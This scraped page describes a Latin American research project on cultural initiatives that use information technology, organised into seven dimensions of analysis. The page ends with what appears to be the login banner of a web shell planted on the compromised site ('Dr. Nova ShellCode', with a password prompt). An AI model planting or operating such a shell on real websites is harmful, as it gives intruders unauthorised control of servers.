Insulares/Divergentes

Error message

Deprecated function: The each() function is deprecated. This message will be suppressed on further calls in menu_set_active_trail() (line 2292 of /var/www/insularesdivergentes.org/includes/menu.inc).

El mapa de cultura latinoamericana está dibujado cada vez más alrededor de la tecnología. La información tecnológica se convierte en un instrumento potente para construir objetivos sociales mediante innovadoras formas aún desconocidas de uso en propuestas culturales.

Este proyecto está enfocado en una investigación casuística extensa sobre aquellas iniciativas implicadas en el desarrollo y cultural latinoamericano apoyado por tecnologías de la información y los nuevos medios de comunicación. Nuestra iniciativa provino de las diferentes formas en por medio de las cuales las tecnologías de la información y los nuevos medios de comunicación están siendo articulados en contextos latinoamericanos, y su amplia gama

de posibilidades y usos centrados en la cultura y el desarrollo.

Como la parte de esta investigación, venimos recolectando, describiendo y documentando la difusión de nuevas prácticas culturales asociadas con las usos emergentes del arte en nuevos medios de comunicación y cultura en contextos específicos como: Argentina, Brasil, Chile, Paraguay, Uruguay, Costa Rica, El Salvador, Honduras, Guatemala, Belice, Nicaragua, Bolivia, Ecuador y Perú.

Para alcanzar e identificar iniciativas artísticas y culturalmente diferenciadas que usan tecnologías de la información y los nuevos medios de comunicación y que contribuyen al desarrollo social y cultural, diseñamos una estrategia analítica que nos permitiera acercarnos a nuestro objeto de estudio con flexibilidad. Para hacer posible esta investigación nos concentramos en siete áreas claves de análisis:

Dimensión filosófica:
refiere a las motivaciones de la iniciativa (problema de base), a sus objetivos, al marco de valores que nutre sus cometidos, al ámbito de acción en el que opera, a las poblaciones que beneficia, entre otros.

Dimensión organizacional:
este rubro sitúa en la mira a los sujetos y/o las organizaciones responsables de la iniciativa, las redes de apoyo con las que cuentan (sponsors, alianzas, contrapartes, redes sociales), su estructura organizativa y operativa (miembros, funciones, procesos, competencias, toma de decisiones), su costo operativo y los mecanismos de financiamiento.

Dimensión tecnológica:
considera qué papel tiene el componente tecnológico en la iniciativa, los recursos específicos que emplea, los motivos que condujeron a su elección entre otro tipo de recursos tecnológicos, los modos cómo son utilizados, la existencia de algún tipo de proposición, invención, o uso particular de la tecnología, los motivos que han dado lugar a este tipo de usos, y las limitaciones tecnológicas que aún existen.

Dimensión contextual:
examina la relación de la iniciativa con el contexto del cual forma parte, su sentido de pertenencia, las condiciones de participación social que ofrece, la visión de desarrollo sociocultural que tiene, su interés y capacidad de involucrar capitales culturales locales, etc.

Dimensión del conocimiento:
contempla si existen experiencias, aprendizajes y modos de hacer típicos del ámbito local que tengan algún tipo de involucramiento con la iniciativa. Asimismo, considera los aprendizajes generados en el seno de la iniciativa y la posibilidad de transmitirlos.

Transmisión (difusión y documentación):
valora la capacidad de transmisión de la experiencia generada a través de la iniciativa, de manera que contempla los mecanismos de difusión que emplea la iniciativa, y los dispositivos que emplea para documentar su propia labor.

Impacto y autoevaluación:
este item refiere a los logros conseguidos por la iniciativa, a los beneficiarios de los mismos, a los mecanismos implementados para monitorear y valorar estos logros, a la capacidad de medición del impacto de los mismos. También contempla las debilidades y fortalezas de la iniciativa.

 

<xmp><body></xmp><xmp></body></html></xmp>Dr. Nova Login To Shell

Dr. Nova ShellCode
| Please Password |